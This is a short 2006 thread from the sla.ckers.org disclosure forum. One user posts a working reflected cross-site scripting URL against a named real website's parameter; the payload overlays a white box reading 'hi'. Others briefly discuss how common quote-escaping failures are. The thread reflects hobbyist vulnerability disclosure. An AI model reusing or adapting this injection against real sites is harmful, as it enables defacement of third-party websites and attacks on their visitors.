Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS, magic_quotes off ..
Posted by: alf
Date: November 09, 2006 11:40AM

Started new topic cuz no backslash is added before quotes and stuff like that, full xss: http://www.ndparking.de/serve.php?dn=%22%3E%3Cdiv%20style=%22position:absolute;%20background-color:white;%20width:500px;%20height:500px;%20top:0px;left:0px%22%3Ehi%3C/div%3E

Options: ReplyQuote
Re: XSS, magic_quotes off ..
Posted by: maluc
Date: November 09, 2006 12:36PM

why is it in its own topic? o.O

more than half of the XSS on the So It Begins thread don't escape quotes

-maluc

Options: ReplyQuote
Re: XSS, magic_quotes off ..
Posted by: alf
Date: November 09, 2006 01:53PM

ah okay, thought it was sth a bit more unique, my apologies for that ;)

Options: ReplyQuote


Sorry, only registered users may post in this forum.